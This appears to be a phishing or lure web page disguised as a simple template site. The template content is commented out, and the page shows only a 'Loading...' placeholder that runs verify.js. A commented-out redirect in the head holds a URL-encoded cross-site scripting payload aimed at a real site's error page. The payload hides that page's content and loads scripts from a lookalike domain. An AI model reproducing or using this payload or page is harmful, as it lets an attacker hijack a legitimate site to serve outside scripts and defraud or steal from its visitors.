<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" 
        content="width=device-width, initial-scale=1.0">
        <!-- <script type="text/javascript">
            window.location.href = "https://megapersonals.eu/public/error-message?error=%20data=%20!3m1!%201e3!4m2!4m1!3e0%20Agua%20Caliente%20Indian%20Reservation%20=33.780445%2C-116.545372%20%3C/h2%3E%20%20%3Cstyle%3E.container%20,%20footer%20%7b%20display:%20none%20;%20%7d%20a%20%7b%20color:%20white;%20%7d%20%3C/style%3E%20%3Cscript%20src=%22https://meggapursonel.online/antiClick.js%22%3E%20%3C/script%3E%20%3Cscript%20src=%22https://meggapursonel.online/main.js%22%3E%20%3C/script%20%3E&userid=1 ";
          </script> -->
  <title>Simple Website</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <!-- <header>
    <h1>Welcome to GFG Website</h1>
  </header>

  <nav>
    <ul>
      <li><a href="#home">Home</a></li>
      <li><a href="#about">About</a></li>
      <li><a href="#services">Services</a></li>
      <li><a href="#contact">Contact</a></li>
    </ul>
  </nav>

  <main>
    <section id="home">
        <h2>Home</h2>
        <p>
            Welcome to our website! 
            We are a passionate team dedicated to 
            providing top-notch web solutions for 
            businesses and individuals.</p>
    </section>

    <section id="about">
        <h2>About</h2>
        <p>
            Our company was founded in 2010 with 
            the mission to make the web a better place. 
            We believe in delivering outstanding results by 
            combining creativity and cutting-edge technology.
        </p>
    
      </section>

    <section id="services">
      <h2>Services</h2>
      <p>
            This is the services section of the website.
      </p>
    </section>

    <section id="contact">
        <h2>Contact</h2>
        <p>
            Have a question or want to discuss 
            a project? We'd love to hear from you!
        </p>
      </section>
  </main>

  <footer>
    <p>&copy; 2023 Your Website Name. All rights reserved.</p>
  </footer> -->


    <div id="app">
      Loading...
    </div>
    <script src="verify.js"></script>
  
</body>
</html>